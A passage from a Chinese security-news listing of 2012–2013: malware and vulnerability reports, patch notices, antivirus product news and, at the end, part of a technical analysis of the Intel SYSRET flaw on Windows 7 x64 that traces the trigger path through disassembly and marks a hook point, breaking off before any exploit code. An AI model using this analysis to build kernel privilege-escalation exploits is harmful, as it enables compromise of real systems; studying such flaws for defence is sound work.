/></p><p>常規的遠程控制操作</p><p>該功能主要實現了8個普通的遠程控制功能,根據不同的遠程指令id執行對應的函數,功能簡要描述如下:</p><p>功能1:下載安裝PC應用</p><p>功能2:下載安裝手機Android應用</p><p>功能3:添加到桌面快捷方式</p><p>功能4:添加網址到收藏夾</p><p>功能5:設置IE瀏覽器主頁</p><p>功能6:查詢掃描注冊表操作</p><p>功能7:掃描桌面,確定是否存在指定文件</p><p>功能8:掃描收藏夾,確定是否存在指定文件</p><p>其中的功能函數分派表如下:</p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082210231833807.png" alt="" /></p><p><span style="color:#ff0000;">自動更新升級</span></p><p>病毒通過一個web地址更新升級adb軟件包。</p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082210231871598.png" alt="" /></p> [系統安全]DNF游戲成盜號木馬重災區、DNF外掛是盜號木馬的主要載體 http://www.pirinnaturalssoapandspa.com//html/21532_1.html 西西 系統安全 2013/7/22 19:05:18 <p>7月16日,360互聯網安全中心發布《2013年第二季度中國個人電腦上網安全報告》。報告指出,目前超過90%的盜號木馬以游戲帳號為目標,<strong>DNF等熱門大型網游是木馬重災區,游戲外掛則是盜號木馬的主要載體</strong>。隨著暑期到來,游戲玩家活躍度提升,盜號木馬的數量很可能將進一步增長。</p><p align="center"><img src="https://pic.cr173.com/up/2013-7/2013072219080870454.jpg" alt="" /></p><p>榜單中,有11 個惡意程序(占到榜單的55%)為盜號木馬或與盜號木馬密切相關。它們分別是排名第3、4 、5、7、8、9、11、14、16、18 和19 的惡意程序。其中,有一些是針對特定應用或游戲的盜號程序,有一些則是感染用戶電腦后,將更多的盜號程序下載到用戶電腦中;還有一些是通過感染驅動程序,篡改啟動項,釋放惡意的批處理文件或動態鏈接庫等手法,最終實現盜取用戶帳號的目的。從360 互聯網安全中心的監測情況來看,目前超過90% 以上的盜號木馬針對的是游戲帳號。</p><p>繼一季度上榜之后,<strong>DNF游戲(地下城與勇士)的盜號木馬和虛假外掛再次登上惡意程序攔截量的TOP20 榜單。</strong>這一方面反映出這款游戲的火爆程度,另一方面也反映出游戲玩家所面臨的巨大風險。特別值得說明的是,因為很多游戲玩家誤以為只要是外掛程序就會被安全軟件報警,因此經常會無視安全軟件的風險提示,手動放行此類惡意程序,對自己的電腦安全造成嚴重的威脅。隨著暑期到來,游戲玩家活躍度的提高,預計游戲盜號木馬還會更加活躍。</p><p><span style="font-weight: bold;">快速入口:</span><br /></p><p>1、DNF密保綁定/管理地址:http://aq.qq.com/cn2/manage/my_mb</p><p>2、QQ登陸記錄查詢地址:http://aq.qq.com/cn2/message_center/message_center_login</p><p>3、DNF密保綁定領獎地址:http://aq.qq.com/cn2/manage/mbtoken/app_priv_index</p><p>對于木馬病毒和釣魚網站的防范措施,<strong>360安全專家石曉虹建議</strong>,廣大網友要及時為系統和常用軟件打補丁,防止木馬利用漏洞遠程入侵;不輕易下載運行可疑文件,如游戲外掛、盜版軟件、陌生人發來的照片等,不輕信陌生網站發布的低價、中獎等誘惑信息;定期更新安全軟件,在安全軟件發出報警提示時提高警惕,第一時間攔截木馬病毒和釣魚網站。<br /></p> [網絡安全]百度站長平臺預警:Apache Struts2高危漏洞來襲 http://www.pirinnaturalssoapandspa.com//html/21441_1.html 百度 網絡安全 2013/7/18 14:55:18 <p>親愛的站長朋友:</p><p>大家好,昨日互聯網遭受了一場漏洞風波——<strong>Apache&nbsp;Struts2</strong>高危漏洞,影響到Struts&nbsp;2.0.0&nbsp;-Struts&nbsp;2.3.15的所有版本。包括國內很多知名網站在內的大量網站受到此漏洞不同程度的影響。攻擊者可以利用該漏洞執行惡意java代碼,最終導致網站數據被竊取、網頁被篡改等嚴重后果,使網站及網民安全受到了極大的威脅。</p><p>為了避免站長們的損失,百度站長平臺現發出<strong>安全風險通告</strong>,請站長們排查網站是否使用Struts2框架,如使用請您及時診斷自己網站是否存在該漏洞。為此,安全聯盟合作伙伴scanv安全中心緊急開發了一款在線小工具,可以幫您快速診斷是否存在此漏洞,詳情點擊:<a href="http://www.scanv.com/tools/" target="_blank">http://www.scanv.com/tools/&nbsp;</a>。</p><p>如果您的網站存在此漏洞,請您進行緊急修復,升級至官方最新版本Struts&nbsp;2.3.15.1,下載地址:http://struts.apache.org/download.cgi#struts23151,升級修補了多個安全漏洞,其中包括這個遠程任意代碼的高危安全漏洞。</p><p>Struts2昨日被曝出遠程執行漏洞。Struts漏洞影響巨大,受影響站點以電商、銀行、門戶、政府居多。而且一些自動化、傻瓜化的利用工具開始出現,填入地址可直接執行服務器命令,讀取數據甚至直接關機等操作...<br /></p><p><span style="color:#ff0000;">另國內知名安全漏洞平臺烏云網站顯示</span>,從昨日開始,收到國內大量知名站點因使用Struts應用框架產生的漏洞,涉及網站包括庫巴網、百度、中國聯通分站、易寶支付、土豆網、京東商城、1號店、百合網、網易、搜狐、淘寶等。目前影響網站仍在增長中。而且漏洞利用代碼已經被強化,可直接通過瀏覽器的提交對服務器進行任意操作并獲取敏感內容。</p><p align="center"><img src="https://pic.cr173.com/up/2013-7/2013071814580489456.jpg" alt="" /></p><p align="center"><img src="https://pic.cr173.com/up/2013-7/2013071814580414550.jpg" alt="" /></p><p>Struts通過采用JavaServlet/JSP技術,實現了基于JavaEEWeb應用的Model-View-Controller(MVC)設計模式的應用框架,是MVC經典設計模式中的一個經典產品,是應用最廣泛的Web應用框架之一。</p><p>白帽子向烏云漏洞報告平臺提交的漏洞列表:</p><p align="center"><img src="https://pic.cr173.com/up/2013-7/2013071814580565141.jpg" alt="" /></p> [系統安全]安卓漏洞補丁CM 10.1.1正式版、拯救99%安卓用戶 http://www.pirinnaturalssoapandspa.com//html/21293_1.html 西西 系統安全 2013/7/11 15:28:22 <p>CyanogenMod 10.1的穩定正式版才發布剛剛半個月,10.1.1穩定版又來了!新版主要針對安卓近期暴露的安全問題做了改進,針對多個漏洞打了補丁。因此,10.1.1版本完全是一個安全性的更新,以及一些bug的修正,不涉及任何新的功能特性。</p><p><strong>其中最關鍵的漏洞補丁包括:</strong></p><p>-Bug 8219321:就是宣稱99%安卓手機都存在的那個<span style="color:#ff0000;">萬能密鑰問題(MasterKey)</span>,安卓1.6以上版本都存在,過去四年間的幾乎所有手機都難逃影響。CM7、CM9也已同步進行了更新。</p><p>- CVE-2013-2094 (Linux內核漏洞)</p><p>- CVE-2013-2596 (高通平臺漏洞)</p><p>- CVE-2013-2597 (高通平臺漏洞)</p><p>建議所有的CM 10.1.0.x用戶更新升級。</p><p>官方下載地址:<a href="http://download.cyanogenmod.com/?type=stable" target="_blank">http://download.cyanogenmod.com/?type=stable</a></p><p align="center"><img src="https://pic.cr173.com/up/2013-7/20137711111530082623.png" alt="" /></p> [安全產品]AV-Test發布Android最新安全應用評測排名、金山手機毒霸國內第一 http://www.pirinnaturalssoapandspa.com//html/19994_1.html 西西 安全產品 2013/4/22 21:34:12 <p>2013年4月22日,國際知名安全評測組織AV-test發布Android最新評測排名。AV-Test測試顯示,共有7款Android安全應用檢測率超過90%,這些應用被AV-Test歸為最優秀的一類。<br />金山手機毒霸排在第8位,360手機衛士排名20,騰訊手機管家排名19。以下是評測結果截圖:</p><p align="center"><img src="https://pic.cr173.com/up/2013-4/2013042221310497358.jpg" alt="" /></p><p>AV-Test此次的測試主要包含兩個方面:防護性、可用性,<strong>防護性得分是指防范惡意軟件(病毒、蠕蟲、木馬)感染的能力</strong>,<strong>可用性得分代表的是安全軟件對整個手機可用性的影響</strong>(耗電、減慢性能、產生流量),兩者的滿分均為6分。</p><p>金山手機毒霸的惡意軟件檢出率為99.76%,行業平均成績為93%,<strong>防護性得分為5.5,可用性得分為6</strong>。</p><p align="center"><img src="https://pic.cr173.com/up/2013-4/2013042221333741607.png" alt="" /><br />金山手機毒霸的AV-Test測試結果</p><p>360手機衛士的惡意軟件檢出率為93%,<strong>防護性得分為3.5,可用性得分為4.0</strong>。</p><p align="center"><img src="https://pic.cr173.com/up/2013-4/2013042221333363185.jpg" alt="" /><br />360手機衛士測試結果</p><p>騰訊手機管家的惡意軟件檢出率為95%,<strong>防護性得分為4.0,可用性得分為4.0</strong>。</p><p align="center"><img src="https://pic.cr173.com/up/2013-4/2013042221333492283.jpg" alt="" /><br />騰訊手機管家測試結果</p> [安全產品]手機瀏覽器“假面瀏覽”病毒爆發 騰訊手機管家首家截獲查殺 http://www.pirinnaturalssoapandspa.com//html/19019_1.html 西西 安全產品 2013/1/17 11:37:39 <p>近日,一款名為“假面瀏覽”(a.rogue.pppowser)的Android病毒被騰訊移動安全實驗室首家截獲。用戶手機一旦被感染,該病毒就會用自己設計好的OO瀏覽器界面替換手機中知名手機瀏覽器的軟件界面。截至目前,已發現有多名用戶反饋自己的手機遇到該情況了。</p><p>據悉,遭遇假面瀏覽病毒替換了軟件界面后,很可能導致用戶手機上網賬號、銀行帳號被泄漏等隱私安全問題。目前,騰訊手機管家已經首家支持對該病毒的精準查殺,用戶可以從官方網站載安裝,并開啟全盤掃描。</p><p><strong>病毒特征:</strong></p><p>該病毒安裝后,開機強制啟動,后臺開啟惡意服務搜索指定瀏覽器進程,私自篡改業界知名瀏覽器主頁,存在流氓行為。</p><p>1、隱蔽性。病毒安裝后無圖標,開機自啟動,后臺偷偷運行并伺機替換手機中的瀏覽器界面。</p><p>2、惡意行為。病毒安裝后,會自動搜索已知的瀏覽器進程,并且密切監控這些手機瀏覽器的啟動狀態,一旦監聽到啟動,病毒就會在瞬間用自己的資源界面掩蓋原先的手機瀏覽器界面,讓用戶使用被替換后的瀏覽器界面。</p><p>3、影響范圍大。目前受該病毒影響的手機瀏覽器包括了UC瀏覽器、天天瀏覽器、360手機瀏覽器、海豚瀏覽器等。</p><p>{insd m=&quot;0&quot; i=&quot;17294&quot;}</p><p><strong>病毒截圖:</strong></p><p align="center"><img alt="" src="https://pic.cr173.com/up/2013-1/2013011711385697255.jpg" /></p><p><strong>專家支招:</strong></p><p>雖然目前該病毒已經在手機論壇、非安全電子市場瘋狂傳播。手機安全專家建議用戶,盡量不要去不安全的第三方電子市場、手機論壇下載應用,因為這些地方是手機病毒最慣用的藏身地。</p><p>同時,要為手機安裝專業的手機安全軟件,定期進行病毒查殺。下載應用的時候,最好去應用的官方網站,Google play或者具備安全檢測的第三方電子市場下載,比如,應用寶、騰訊手機管家“軟件游戲”等。</p> [安全產品]百度在東南亞泰國等地推出Baidu PC Faster、搶占安全軟件市場 http://www.pirinnaturalssoapandspa.com//html/18919_1.html 西西 安全產品 2013/1/9 14:33:44 <p align="center"><img alt="" src="https://pic.cr173.com/up/2013-1/2013010914311038945.png" /></p><p>“百度的 Baidu PC Faster 軟件為什么不面向國內市場?”眾多網友了解到原來百度在泰國不是做搜索,做的居然是安全,笑稱這才是真正的“泰囧”。據該網友稱,Baidu PC Faster 是百度面向國外市場推出的一款系統清理 / 加速類的工具軟件,目前還沒見到中文版。</p><p>通過 Baidu PC Faster 的官方網站我們可以了解到,這確實是一款電腦系統輔助軟件,和國內的 360 安全衛士非常類似,不過功能要稍微簡單一些,目前只支持英語和泰語。根據官方網站的介紹,Baidu PC Faster 主要提供系統啟動時間管理、系統升級(漏洞修復)、垃圾清理和電腦體檢的功能。網站的版權標注為“Copyright &copy; 2013 Baidu (Hong Kong) Limited. All Rights Reserved”,有網友稱這的確是百度在香港注冊的全資子公司。</p><p align="center"><img alt="" src="https://pic.cr173.com/up/2013-1/2013010914311072860.png" /></p><p>隨后有網友指出百度在 2012 年曾收購安全軟件 PC 巡警,并且在深圳招了一堆客戶端研發工程師和病毒分析師,有意進入安全領域。之所以選擇在泰國推出,可能是因為國內的安全軟件市場幾乎飽和。360 一家獨大,騰訊和金山也一直在追趕,百度很難找到切入點。據了解,百度之前曾和金山合作在國內推出過“百度電腦管家”,功能和 360 安全衛士類似,不過表現十分欠佳。此番選擇在國外推出安全產品,會是百度的迂回政策嗎?</p><p>附視頻演示(亮點在 4 分 16 秒):</p><p align="center"><embed align="middle" src="http://player.youku.com/player.php/sid/XNDk5MTA5MTM2/v.swf" width="480" height="400" type="application/x-shockwave-flash" allowscriptaccess="always" quality="high" allowfullscreen="true" /></p> [安全產品]國外知名殺毒軟件比特梵德BitDefender發布免費版 http://www.pirinnaturalssoapandspa.com//html/18885_1.html 西西 安全產品 2013/1/7 10:36:45 <p>比特梵德BitDefender,可是國外長期雄居殺軟排行榜第一的反病毒、系統保護軟件,現在也開始加入免費的大軍(是不是受國內安全軟件市場免費策略的影響哦)。免費殺毒軟件如今已經越來越多,譬如&nbsp;Avast!、金山毒霸、AVG、小紅傘、微軟MSE、Comodo、熊貓云等等。如今國外一些傳統的殺軟廠商也紛紛開始加入免費的大軍,可選擇的余地越來越多了。</p><p>知名殺毒軟件品牌&nbsp;<strong>BitDefender</strong>&nbsp;終于也推出了全功能<strong>免費版的殺毒軟件</strong>&nbsp;——&nbsp;BitDefender Antivirus Free Edition。它最大的特點就是小巧輕盈、界面精美,完美支持&nbsp;Windows 8,并且殺毒能力強勁。根據AVTest的測試數據統計,BitDefender 的殺毒率高達94%,比Avast!還要高一點~唯一可惜的是目前還沒有中文語言界面……</p><p>{insd m=&quot;0&quot; i=&quot;53259&quot;}</p><p><strong>BitDefender 免費殺毒軟件:</strong></p><p>下面看看&nbsp;BitDefender 免費殺毒軟件的界面吧,是否有耳目一新的感覺?并且,BitDefender 的設計非常簡潔??!對于一些不太熟悉使用電腦的用戶,BitDefender 的幾乎零配置可謂非常方便,即便給家長們的電腦安裝也很合適。因為它只有兩個總開關“Virus Shield”(病毒防護盾) 、“Auto Scan”(自動掃描) 和一個登錄按鈕。而且也不像一些國產殺軟那樣會彈出什么煩人的廣告~</p><p align="center"><img alt="" src="https://pic.cr173.com/up/2013-1/201317103021.jpg" /></p><p>如果你希望長期免費使用 BitDefender 的話,你唯一需要做的就是通過這里注冊一個賬號,并在殺毒軟件里面登錄進去即可。如果不注冊不登錄賬號的話,你只能免費得到30天的病毒庫升級服務,過期病毒庫就不升級了。</p><p>雖然說&nbsp;BitDefender&nbsp;的界面與功能都非常簡單甚至說是簡陋,但我個人倒是越來越喜歡這種極簡的工具和軟件,專注核心功能,不需要用戶過多的學習和花費精力時間去配置就能好好地為用戶工作,也是一種極致。當然,肯定會有人認為這種軟件不夠“專業”不夠“強大”,這就見仁見智了,追求強大功能的朋友也可以去試試收費版本的&nbsp;BitDefender Internet Security&nbsp;(互聯網安全套裝)。</p><p><strong>安全前病毒掃描功能:</strong></p><p>值得一提的是,雖然&nbsp;<strong>BitDefender 免費版</strong>功能非常簡潔,但它依然保留了在安裝之前就可以先為系統查殺病毒,這一點有時在遇到有病毒的環境時特別有用!</p><p align="center"><img alt="" src="https://pic.cr173.com/up/2013-1/201311771032401264.jpg" /></p><p><strong>寫在后面:</strong></p><p>總之,BitDefender&nbsp;免費殺毒軟件的精美界面讓我一下子對這款殺軟產生了好感,而其極簡的設計風格又讓我覺得它與大多數其他殺毒軟件有所不同。強而有力的殺毒內核技術又讓它不僅僅是個“面子貨”,這實用的殺毒能力加上清爽酷黑的界面與輕盈快速的感覺也比其他“笨重”的大型殺軟來得更“小清新”一些?;蛟S,這可能就是很多人一直想尋找的殺毒軟件了吧!異次元軟件世界怎么能不推薦大家試一試呢……</p> [安全產品]360安全衛士9.0Beta新版發布,全新界面,更多驚喜~ http://www.pirinnaturalssoapandspa.com//html/18782_1.html 西西 安全產品 2012/12/27 9:18:34 <p>經過360的產品經理、設計師和工程師們通宵達旦的奮戰——360安全衛士9.0Beta版今天發布啦,新版本相比之前又有了重大飛躍!<br />新版界面進行了全面統一,希望能帶給大家更多驚喜——設計更精美,功能更強大,體驗更平滑、流暢。在此感謝大家,衛士進步離不開大家熱心幫助和支持!</p><p>{insd m=&quot;0&quot; i=&quot;3188&quot;}</p><p><strong>亮點一 全新動感安裝界面</strong></p><p>全新的安裝界面,清新自然,簡潔直觀,整個安裝過程都是動態的,讓你在靜與動之間,感受衛士帶來的全心保護!</p><p align="center"><img alt="" src="https://pic.cr173.com/up/2012-12/2012122709201961028.jpg" /></p><p><strong>亮點二 一鍵電腦加速</strong></p><p>“流量懸浮窗”華麗變身——成為“電腦加速”!</p><p>“電腦加速”擁有簡潔生動的界面,可以根據電腦使用情況進行智能分析,為你關閉不重要且耗費資源的程序?!耙绘I提速”,只需輕輕一點,就能讓你的電腦卸掉重擔,運轉如飛!</p><p align="center"><img alt="" src="https://pic.cr173.com/up/2012-12/2012122709202051657.jpg" /></p><p><strong>亮點三 電腦門診2.0</strong></p><p>“電腦門診”進行了重大創新!我們開創性地推出搜索式界面,一搜解決電腦疑難雜癥。門診問題會分類展現,查找問題更加方便、高效。全面的修復方案為大家提供一站式電腦修復服務!不僅如此,你還可點擊提交問題,讓億萬360用戶幫您解答電腦疑難雜癥!</p><p align="center"><img alt="" src="https://pic.cr173.com/up/2012-12/2012122709202062610.jpg" /></p><p></p><p><strong>亮點四 全新電腦防護</strong></p><p>全新的安全防護彈窗,標題更加精簡,主題更加突出明確。新版本還對按鈕歸精簡,并采取了全新的簡約式設計,讓彈窗也變得氣質十足!</p><p>更重要的是,“電腦防護”規則也進行了全面重造,所有內容更加體系化,使你的電腦防護無死角。<br /></p><p align="center"><img alt="" src="https://pic.cr173.com/up/2012-12/2012122709202062346.jpg" /></p><p></p><p><strong>亮點五 健康綠皮膚 質感提升</strong></p><p>我們采納了之前廣大“衛星”最廣泛的意見,將衛士界面統一設置為健康綠,質感全面提升,風格清新、大方、靈動,讓你在享有安全防護的同時也擁有一份綠色好心情!</p><p align="center"><img alt="" src="https://pic.cr173.com/up/2012-12/2012122709202292762.jpg" /></p> [病毒漏洞]IE瀏覽器新漏洞能夠追蹤鼠標移動、IE 6.0以上所有版本無一幸免 http://www.pirinnaturalssoapandspa.com//html/18587_1.html 西西 病毒漏洞 2012/12/13 9:44:37 <p>微軟盡管一直試圖提高Internet Explorer的公眾形象--不過它依然還有很長的一段路要走。<strong>今天根據連線的報道,惡意網站能夠通過這個新的安全漏洞屏幕上跟蹤你的鼠標移動,</strong>而目前所有IE瀏覽器6.0以上所有版本都會受到影響。如果不信的話可以通過微軟的瀏覽器訪問這個無害的網站,或者你可以通過下面這段視頻進一步了解:</p><p align="center"><embed height="400" type="application/x-shockwave-flash" align="middle" width="480" src="http://player.youku.com/player.php/sid/XNDg3NjIxMzA4/v.swf" allowscriptaccess="always" quality="high" allowfullscreen="true" /></p><p>該漏洞由于網頁分析公司Spider.io發現,同時早在今年10月份的時候就報告給微軟。但是微軟的反應并不是十分的迅速,根據連線的報道稱“微軟的安全研究中心已經收到了這方面的報告,但是之間還沒有敲定何時推出相關的補丁程序?!?lt;/p> [系統安全]Intel Sysret 漏洞在WIN7 X64下的實現分析 http://www.pirinnaturalssoapandspa.com//html/18440_1.html wowocock 系統安全 2012/12/4 11:57:32 <p>intel&nbsp;&nbsp;sysret 漏洞在WIN7 X64下的實現分析。<span style="color:#6600cc;">前半部分是網上現有的文章分析,后半部分為代碼實現分析</span></p><p><strong>1. 漏洞淺析<br /></strong>在x64系統上,最重要的48位虛擬地址將被用于地址轉換,而此外48到63的任何虛擬地址必須是47位的副本。否則處理器會拋出異常:保護故障(GP)。<br /><br />這會將虛擬地址分割位兩個區塊,如:<br />·&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;規范的高階半區: 0xFFFFFF`FFFFFFFF&nbsp; &nbsp;&nbsp; &nbsp; 0xFFFF8000`00000000</p><p>·&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;規范的低階半區: 0x00007FFF`FFFFFFFF&nbsp; &nbsp;0x00000000`00000000</p><p><br />而所有這之間的地址都會被認為是不規范的。<br /><br />SYSRET指令被用于傳遞返回到普通用戶模式(user-mode)。它將RCX寄存器中的值復制到RIP寄存器中,并把Code Segment Selector位切換位普通用戶模式(user-mode)。然而,RCX寄存器是一個通用寄存器,它可能包含的任何值,包括不規范的地址。并且SYSRET指令一旦拋出異常是不負責退棧切換回用戶空間的,也不負責為GS寄存器做掃尾工作。這意味著,程序員在調用SYSRET指令前后都需要為GS,RSP,RBP做額外的處理。<br /><br />而我們恰好發現intel的SYSRET指令實現中存在一個缺陷: 如果一個不規范的地址從RCX寄存器傳遞而拋出GP, 那么在CG,RBP和RSP返回普通用戶模式(user-mode)前, 其ring0的權限不會被取締(因為沒有任何掃尾工作)。<br /><br /><strong>2. MS windows中的漏洞觸發<br /></strong><br />利用這個漏洞的關鍵是要拋出一個不規范的返回地址,而為了在MS Windows中觸發這個漏洞,我們可以有以下的方式:<br /><br />·&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;映射內存并在0x7FFF`FFFFFFFF位執行一個系統調用。這將返回一個不規范的地址。然而,由于Windows地址空間的限制,這個地址是不可達的,因此此路不通羅馬。</p><p>·&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;尋找一個系統調用,并能手動改變返回地址。</p><p><br />關于后者,可借力于UMS(User-Mode Scheduling 用戶模式計劃程序)。<br />&nbsp;&nbsp;ps: MSDN,UMS是一個輕量級的機制,應用程序可以用它來安排自己的線程。應用程序可以在用戶模式下自由進行UMS線程間的切換而不必不涉及系統調度。<br /><br />為了使用UMS線程,可以用CreateUmsCompletionList()函數創建一個的UMS調度列表。scheduler線程將被鏈接到此調度列表,而scheduler線程也將需要被創建(scheduler線程通過EnterUmsSchedulingMode()從普通線程晉升為UMS線程)。<br /><br />如果UMS線程啟動或阻塞,那么ExecuteUmsThread()函數需要被調用。如果沒有, scheduler需要確定哪些線程將隨后運行。它將排列調度列表,選擇正確的線程。<br /><br />EnterUmsSchedulingMode()函數是ntdll.dll中實現的。從匯編代碼中,我們可以看到,它得到當前的UMS線程,完成鏈接調度列表,保存線程上下文(寄存器),然后調用RtlpUmsPrimaryContextWrap()函數。</p><p>1.&nbsp; &nbsp; .text:0000000078F33A20 RtlEnterUmsSchedulingMode</p><p>2.&nbsp; &nbsp; .text:0000000078F33A20</p><p>3.&nbsp; &nbsp; .text:0000000078F33A20 arg_0 = qword ptr 8</p><p>4.&nbsp; &nbsp; .text:0000000078F33A20 arg_8 = qword ptr 10h</p><p>5.&nbsp; &nbsp; .text:0000000078F33A20 arg_10 = qword ptr 18h</p><p>6.&nbsp; &nbsp; .text:0000000078F33A20</p><p>7.&nbsp; &nbsp; .text:0000000078F33A20 mov [rsp+arg_8], rbx</p><p>8.&nbsp; &nbsp; .text:0000000078F33A25 mov [rsp+arg_10], rsi</p><p>9.&nbsp; &nbsp; .text:0000000078F33A2A push rdi</p><p>10.&nbsp;&nbsp;.text:0000000078F33A2B sub rsp, 20h</p><p>11.&nbsp;&nbsp;.text:0000000078F33A2F mov rsi, [rcx+8]</p><p>12.&nbsp;&nbsp;.text:0000000078F33A33 mov rbx, [rcx+10h]</p><p>13.&nbsp; &nbsp; [...]</p><p>14.&nbsp;&nbsp;.text:0000000078F33A5D loc_78F33A5D:</p><p>15.&nbsp;&nbsp;.text:0000000078F33A5D mov rdx, rsi</p><p>16.&nbsp;&nbsp;.text:0000000078F33A60 xor ecx, ecx</p><p>17.&nbsp;&nbsp;.text:0000000078F33A62 call RtlpAttachThreadToUmsCompletionList</p><p>18.&nbsp;&nbsp;.text:0000000078F33A67 test eax, eax</p><p>19.&nbsp;&nbsp;.text:0000000078F33A69 js short loc_78F33AA0</p><p>20.&nbsp;&nbsp;.text:0000000078F33A6B lea rcx, [rsp+28h+arg_0]</p><p>21.&nbsp;&nbsp;.text:0000000078F33A70 call RtlGetCurrentUmsThread</p><p>22.&nbsp;&nbsp;.text:0000000078F33A75 test eax, eax</p><p>23.&nbsp;&nbsp;.text:0000000078F33A77 js short loc_78F33A94</p><p>24.&nbsp;&nbsp;.text:0000000078F33A79 mov rcx, [rsp+28h+arg_0]</p><p>25.&nbsp;&nbsp;.text:0000000078F33A7E call RtlpSaveUmsdebugRegisterState</p><p>26.&nbsp;&nbsp;.text:0000000078F33A83 test eax, eax</p><p>27.&nbsp;&nbsp;.text:0000000078F33A85 js short loc_78F33A94</p><p>28.&nbsp;&nbsp;.text:0000000078F33A87 mov rdx, rdi</p><p>29.&nbsp;&nbsp;.text:0000000078F33A8A mov rcx, rbx</p><p>30.&nbsp;&nbsp;.text:0000000078F33A8D call RtlpUmsPrimaryContextWrap</p><p>31.&nbsp;&nbsp;.text:0000000078F33A92 jmp short $+2</p><p>RtlpUmsPrimaryContextWrap()函數負責調用scheduler并保存線程信息在一個結構中(ps:這是一個非文檔化的結構),通過反匯編我們可以知道此結構為:<br />&nbsp;&nbsp;RSP<br />&nbsp;&nbsp;RBP<br />&nbsp;&nbsp;返回地址</p><p>1.&nbsp; &nbsp; .text:0000000078EA03F0 RtlpUmsPrimaryContextWrap</p><p>2.&nbsp; &nbsp; .text:0000000078EA03F0</p><p>3.&nbsp; &nbsp; .text:0000000078EA03F0 var_108 = xmmword ptr -108h</p><p>4.&nbsp; &nbsp; .text:0000000078EA03F0 var_F8 = xmmword ptr -0F8h</p><p>5.&nbsp; &nbsp; .text:0000000078EA03F0 var_E8 = xmmword ptr -0E8h</p><p>6.&nbsp; &nbsp; .text:0000000078EA03F0 var_D8 = xmmword ptr -0D8h</p><p>7.&nbsp; &nbsp; .text:0000000078EA03F0 var_C8 = xmmword ptr -0C8h</p><p>8.&nbsp; &nbsp; .text:0000000078EA03F0 var_38 = byte ptr -38h</p><p>9.&nbsp; &nbsp;&nbsp; &nbsp;[...]</p><p>10.&nbsp;&nbsp;.text:0000000078EA0452 mov [rax+30h], r15</p><p>11.&nbsp;&nbsp;.text:0000000078EA0456 mov r10, gs:14A0h</p><p>12.&nbsp;&nbsp;.text:0000000078EA045F lea r10, [r10+10h]</p><p>13.&nbsp;&nbsp;.text:0000000078EA0463 lea r11, loc_78EA0493</p><p>14.&nbsp;&nbsp;.text:0000000078EA046A mov [r10+0D0h], rcx&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; //這里將被HOOK </p><p>15.&nbsp;&nbsp;.text:0000000078EA0471 mov [r10+0A0h], rbp</p><p>16.&nbsp;&nbsp;.text:0000000078EA0478 mov [r10+98h], rsp</p><p>17.&nbsp;&nbsp;.text:0000000078EA047F mov [r10+0F8h], r11&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;// saved return</p><p>18.&nbsp;&nbsp;.text:0000000078EA0486 mov r12, 0</p><p>19.&nbsp;&nbsp;.text:0000000078EA048D xor r13, r13</p><p>20.&nbsp;&nbsp;.text:0000000078EA0490 mov r14, rdx</p><p>21.&nbsp;&nbsp;.text:0000000078EA0493</p><p>22.&nbsp;&nbsp;.text:0000000078EA0493 loc_78EA0493:</p><p>23.&nbsp;&nbsp;.text:0000000078EA0493 mov r10, gs:14A0h</p><p>24.&nbsp;&nbsp;.text:0000000078EA049C lea r10, [r10+10h]</p><p>25.&nbsp;&nbsp;.text:0000000078EA04A0 mov r11, [r10+0D0h]&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;// scheduler func</p><p>26.&nbsp;&nbsp;.text:0000000078EA04A7 mov rcx, r12</p><p>27.&nbsp;&nbsp;.text:0000000078EA04AA mov rdx, r13</p><p>28.&nbsp;&nbsp;.text:0000000078EA04AD mov r8, r14</p><p>29.&nbsp;&nbsp;.text:0000000078EA04B0 call r11&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;// calls the scheduler function</p><p>30.&nbsp;&nbsp;.text:0000000078EA04B3 lea rcx, [rsp+138h+var_38]</p><p>31.&nbsp;&nbsp;.text:0000000078EA04BB movaps xmm6, [rsp+138h+var_108]</p><p>32.&nbsp;&nbsp;.text:0000000078EA04C0 movaps xmm7, [rsp+138h+var_F8]</p><p><strong>如果我們調試內核</strong>,在Ntoskrnl.exe的KeBuildPrimaryThreadContext()函數處設置bp,我們可以看到0x00000000`78EA0493被保存為返回到用戶空間的地址。</p><p>1.&nbsp; &nbsp; PAGE:FFFFF80002C5A070 KeBuildPrimaryThreadContext</p><p>2.&nbsp; &nbsp; PAGE:FFFFF80002C5A070</p><p>3.&nbsp; &nbsp; PAGE:FFFFF80002C5A070 arg_0 = qword ptr 8</p><p>4.&nbsp; &nbsp; PAGE:FFFFF80002C5A070 arg_20 = qword ptr 28h</p><p>5.&nbsp; &nbsp; PAGE:FFFFF80002C5A070 arg_28 = qword ptr 30h</p><p>6.&nbsp; &nbsp; PAGE:FFFFF80002C5A070</p><p>7.&nbsp; &nbsp; PAGE:FFFFF80002C5A070 mov [rsp+arg_0], rbx</p><p>8.&nbsp; &nbsp; PAGE:FFFFF80002C5A075 movsxd rbx, r9d</p><p>9.&nbsp; &nbsp; PAGE:FFFFF80002C5A078 mov r9, rdx</p><p>10.&nbsp;&nbsp;PAGE:FFFFF80002C5A07B xor r10d, r10d</p><p>11.&nbsp;&nbsp;PAGE:FFFFF80002C5A07E mov rax, [rcx+1B8h]</p><p>12.&nbsp;&nbsp;PAGE:FFFFF80002C5A085 mov r11, [rax]</p><p>13.&nbsp;&nbsp;PAGE:FFFFF80002C5A088 cmp r8, r10</p><p>14.&nbsp;&nbsp;PAGE:FFFFF80002C5A08B jz loc_FFFFF80002C5A168</p><p>15.&nbsp;&nbsp;[...]</p><p>16.&nbsp;&nbsp;PAGE:FFFFF80002C5A168 loc_FFFFF80002C5A168:</p><p>17.&nbsp;&nbsp;PAGE:FFFFF80002C5A168 mov rdx, 